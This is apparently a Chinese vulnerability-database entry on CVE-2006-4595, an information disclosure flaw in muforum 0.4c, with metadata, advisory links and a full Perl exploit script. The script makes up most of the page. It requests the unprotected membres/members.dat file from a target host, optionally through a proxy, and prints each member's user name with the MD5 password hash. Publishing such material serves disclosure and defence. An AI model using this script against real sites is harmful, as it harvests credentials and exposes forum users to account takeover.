muforum 敏感信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193593 漏洞类型 信息泄露
发布时间 2006-09-06 更新时间 2007-01-24
CVE编号 CVE-2006-4595 CNNVD-ID CNNVD-200609-087
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://cxsecurity.com/issue/WLB-2006090042
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-087
|漏洞详情
muforum(forum)0.4c将membres/members.dat存储在Web文件根目录下,但没有充分的访问控制,远程攻击者获取用户名和密码杂凑之类的敏感信息。
|漏洞EXP
#!/usr/bin/perl

#

# Affected.scr..: µforum v0.4c

# Poc.ID........: 08060901

# Type..........: Member's passwords are stored in .dat file no protected by a .htaccess file

# Risk.level....: Medium

# Vendor.Status.: Unpatched

# Src.download..: comscripts.com/scripts/php.forum.1568.html

# Poc.link......: acid-root.new.fr/poc/08060901.txt

# Credits.......: DarkFig

#

use LWP::UserAgent;

use HTTP::Request;

use Getopt::Long;

use strict;

print STDOUT "n+", '-' x 36, "+n";

print STDOUT "| µforum v0.4c (members.dat) Exploit |n";

print STDOUT '+', '-' x 36, "+n";

my($host,$path,$proxh,$proxu,$proxp);

my $opt = GetOptions(

'host=s'   =>  $host,

'path=s'   =>  $path,

'proxh=s'  =>  $proxh,

'proxu=s'  =>  $proxu,

'proxp=s'  =>  $proxp);

if(!$path) {$path = '/';}

$host .= $path.'membres/members.dat';

if($host  !~ /http/) {$host = 'http://'.$host;}

my $ua = LWP::UserAgent->new();

$ua->agent('Mozilla');

$ua->timeout(30);

$ua->proxy(['http'] => $proxh) if $proxh;

my $req = HTTP::Request->new('GET', $host);

$req->proxy_authorization_basic($proxu, $proxp) if $proxp;

my $res = $ua->request($req);

my $dat = $res->content;

my @tabl= split(/:/, $dat);

foreach (@tabl) {

if($_ =~ /"(.*)";a/){

print "n".$1.'::';}

if($_ =~ /"([a-z0-9]{32})";i/){

print $1;}

}

print "n";

exit(0);
|参考资料

来源:BUGTRAQ
名称:20060901µforumv0.4c(members.dat)MD5PasswdHashDisclosurePoc
链接:http://www.securityfocus.com/archive/1/archive/1/445001/100/0/threaded
来源:VUPEN
名称:ADV-2006-3445
链接:http://www.frsirt.com/english/advisories/2006/3445
来源:SREASON
名称:1514
链接:http://securityreason.com/securityalert/1514
来源:SECUNIA
名称:21742
链接:http://secunia.com/advisories/21742
来源:MISC
链接:http://acid-root.new.fr/poc/08060901.txt